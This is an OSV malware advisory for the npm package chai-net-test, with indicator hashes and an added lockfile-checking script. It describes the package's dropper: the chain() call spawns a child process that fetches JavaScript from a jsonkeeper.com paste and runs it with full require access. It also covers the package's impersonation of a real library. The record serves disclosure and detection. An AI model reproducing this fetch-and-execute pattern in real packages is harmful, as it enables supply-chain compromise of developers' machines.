MAL-2026-5607

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-net-test/MAL-2026-5607.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5607
Published
2026-06-11T07:41:17Z
Modified
2026-06-11T08:01:31.204160208Z
Summary
Malicious code in chai-net-test (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e)

chai-net-test ships a remote-code-execution dropper behind its public chain() API. When a consumer calls chain([...]) (the documented entry point), src/index.js spawns src/utils/swap.js as a detached child Node process. swap.js performs axios.get('https://www.jsonkeeper.com/b/5IZTJ'), takes the response's .Cookie string, builds a function via new Function.constructor('require', s), and invokes it with the package's require, granting the attacker-supplied JavaScript full Node module access on the consumer's machine. The destination is jsonkeeper.com, a public anonymous JSON paste host whose contents are fully mutable by whoever holds the paste id, so the executed bytes can change at any moment without any package republish.

The package additionally impersonates the legitimate stream-chaining library chain by uhop: the README claims to be a 'lightweight, no-dependencies micro-package' and links to uhop's wiki, while package.json declares runtime dependencies on axios and sqlite3. This is a cover story to lure consumers of the real library into invoking the trojaned API.
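
A lockfile check for the package described above, as an added example (not part of the advisory or of any scanner's own code). The function name findAffected and the sample lockfile are constructed for illustration; the package name, version and integrity hash are the ones this record lists.

```javascript
'use strict';
// Values copied from this advisory (MAL-2026-5607).
const BAD_NAME = 'chai-net-test';
const BAD_VERSIONS = new Set(['1.1.0']);
const BAD_INTEGRITY = 'sha512-l5Z6rw56SyhxbSseKCklCZ+jsD5hW4EYLfDNitevW1TGJXBltQ4+RLmExgf+4YaARiY6usQv1g76GbdQdvj/Ww==';

// Returns one finding per lockfile entry that resolves to the malicious package.
function findAffected(lock) {
  const hits = [];
  const record = (where, version, integrity) => hits.push({
    where, version,
    knownBadVersion: BAD_VERSIONS.has(version),
    knownBadTarball: integrity === BAD_INTEGRITY,
  });

  // lockfileVersion 2/3: flat "packages" map keyed by install path.
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    // An aliased install keeps the real package name in entry.name.
    const name = entry.name || path.split('node_modules/').pop();
    if (name === BAD_NAME) record(path, entry.version, entry.integrity);
  }

  // lockfileVersion 1: nested "dependencies" tree (transitive deps included).
  // Skipped when "packages" exists: v2 files carry both views of the same tree.
  const walk = (deps, trail) => {
    for (const [key, entry] of Object.entries(deps || {})) {
      const where = `${trail}/${key}`;
      // v1 records an alias as version "npm:<real-name>@<version>".
      const alias = /^npm:(.+)@([^@]+)$/.exec(entry.version || '');
      const name = alias ? alias[1] : key;
      const version = alias ? alias[2] : entry.version;
      if (name === BAD_NAME) record(where, version, entry.integrity);
      walk(entry.dependencies, where);
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');
  return hits;
}

// Constructed sample lockfile (not from the advisory): the package arrives transitively.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '0.0.1' },
    'node_modules/axios': { version: '1.7.2' },
    'node_modules/some-helper/node_modules/chai-net-test': { version: '1.1.0', integrity: BAD_INTEGRITY },
  },
};
console.log(findAffected(sampleLock));
```

To audit a real project, pass the parsed contents of its package-lock.json to findAffected; any finding means the dependency should be removed and the host treated as having run untrusted code if chain() was ever called.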

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005709",
            "versions": [
                "1.1.0"
            ],
            "sha256": "cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T07:41:17Z",
            "import_time": "2026-06-11T07:49:43.445804625Z"
        }
    ]
}
References
Credits

Affected packages

npm / chai-net-test

Package

Affected ranges

Affected versions

1.*
1.1.0

Database specific

indicators
{
    "evidence_files": [
        {
            "path": "src/utils/swap.js",
            "sha256": "4a0017b65e11fcd09a3fe9a33ef4a08712ce4330e2eb03eb7d0c4ef5a311d8e5",
            "tlsh": "2601978f70ac545c09b013e6bb2be436f522b56a390281d0339c86421f769a96653eee"
        },
        {
            "path": "package.json",
            "sha256": "93e6a386d4d72f48f43e437d73ee8a02276c567d8ffc6829fa1be7c3775ebc08",
            "tlsh": "1a417a32d4729c9306c51525e8ad1a1762a088abcf84fd5ab78242accf4d46f58bc76f"
        }
    ],
    "package_integrity": [
        {
            "filename": "chai-net-test-1.1.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-l5Z6rw56SyhxbSseKCklCZ+jsD5hW4EYLfDNitevW1TGJXBltQ4+RLmExgf+4YaARiY6usQv1g76GbdQdvj/Ww==",
                "sha1": "4c7cf33e8768e115f8dbdf0757833c5a39f52101"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-net-test/MAL-2026-5607.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]